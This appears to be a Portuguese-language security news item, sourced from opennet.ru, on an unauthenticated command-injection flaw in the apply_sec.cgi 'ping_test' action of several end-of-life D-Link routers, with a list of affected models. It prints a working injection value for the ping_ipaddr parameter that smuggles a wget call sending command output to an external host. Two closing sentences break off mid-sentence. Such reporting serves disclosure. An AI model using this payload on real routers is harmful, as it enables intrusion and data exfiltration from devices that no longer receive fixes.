Em roteadores sem fio D-Link
Curiosamente, segundo os desenvolvedores do firmware, a chamada “ping_test” deve ser executada somente após a autenticação, mas na realidade ela é chamada em qualquer caso, independente do login na interface web. Em particular, ao acessar o script apply_sec.cgi e passar o parâmetro “action=ping_test”, o script redireciona para a página de autenticação, mas ao mesmo tempo executa a ação associada ao ping_test. Para executar o código, outra vulnerabilidade foi utilizada no próprio ping_test, que chama o utilitário ping sem verificar adequadamente a exatidão do endereço IP enviado para teste. Por exemplo, para chamar o utilitário wget e transferir os resultados do comando “echo 1234” para um host externo, basta especificar o parâmetro “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// teste.teste/?$(eco 1234)".
A presença da vulnerabilidade foi oficialmente confirmada nos seguintes modelos:
- DIR-655 com firmware 3.02b05 ou anterior;
- DIR-866L com firmware 1.03b04 ou anterior;
- DIR-1565 com firmware 1.01 ou anterior;
- DIR-652 (nenhuma informação sobre versões de firmware problemáticas é fornecida)
O período de suporte para estes modelos já expirou, então a D-Link
Mais tarde foi descoberto que a vulnerabilidade também estava
Fonte: opennet.ru